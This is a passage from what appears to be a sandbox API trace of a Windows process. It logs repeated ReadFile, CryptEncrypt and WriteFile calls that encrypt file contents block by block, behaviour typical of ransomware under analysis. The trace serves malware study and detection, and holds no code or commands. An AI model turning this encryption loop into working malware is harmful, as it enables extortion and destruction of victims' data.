pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.338] GetLastError () returned 0x0 [0155.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.338] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.338] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.338] GetLastError () returned 0x0 [0155.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.338] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.338] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.338] GetLastError () returned 0x0 [0155.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.338] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.338] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.338] GetLastError () returned 0x0 [0155.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.338] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.339] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.339] GetLastError () returned 0x0 [0155.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.339] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.339] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.339] GetLastError () returned 0x0 [0155.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.339] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.339] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.339] GetLastError () returned 0x0 [0155.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.339] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.339] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.339] GetLastError () returned 0x0 [0155.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.339] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.339] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.339] GetLastError () returned 0x0 [0155.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.339] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.339] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.339] GetLastError () returned 0x0 [0155.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.339] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.339] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.339] GetLastError () returned 0x0 [0155.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.340] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.340] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.340] GetLastError () returned 0x0 [0155.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.340] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.340] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.340] GetLastError () returned 0x0 [0155.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.340] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.340] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.340] GetLastError () returned 0x0 [0155.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.340] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.340] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.340] GetLastError () returned 0x0 [0155.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.340] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.340] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.340] GetLastError () returned 0x0 [0155.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.340] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.340] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.340] GetLastError () returned 0x0 [0155.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.340] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.341] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.341] GetLastError () returned 0x0 [0155.341] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.341] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.341] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.341] GetLastError () returned 0x0 [0155.341] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.341] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.341] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.341] GetLastError () returned 0x0 [0155.341] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.341] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.341] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.341] GetLastError () returned 0x0 [0155.341] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.341] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.341] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.341] GetLastError () returned 0x0 [0155.341] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.341] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.341] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.341] GetLastError () returned 0x0 [0155.341] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.341] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.341] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.342] GetLastError () returned 0x0 [0155.342] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.342] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.342] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.342] GetLastError () returned 0x0 [0155.342] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.342] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.342] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.342] GetLastError () returned 0x0 [0155.342] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.342] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.342] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.342] GetLastError () returned 0x0 [0155.342] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.342] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.342] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.342] GetLastError () returned 0x0 [0155.342] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.342] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.342] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.342] GetLastError () returned 0x0 [0155.342] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.342] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.343] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.343] GetLastError () returned 0x0 [0155.343] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.343] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.343] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.343] GetLastError () returned 0x0 [0155.343] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.343] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.343] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.343] GetLastError () returned 0x0 [0155.343] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.343] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.343] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: 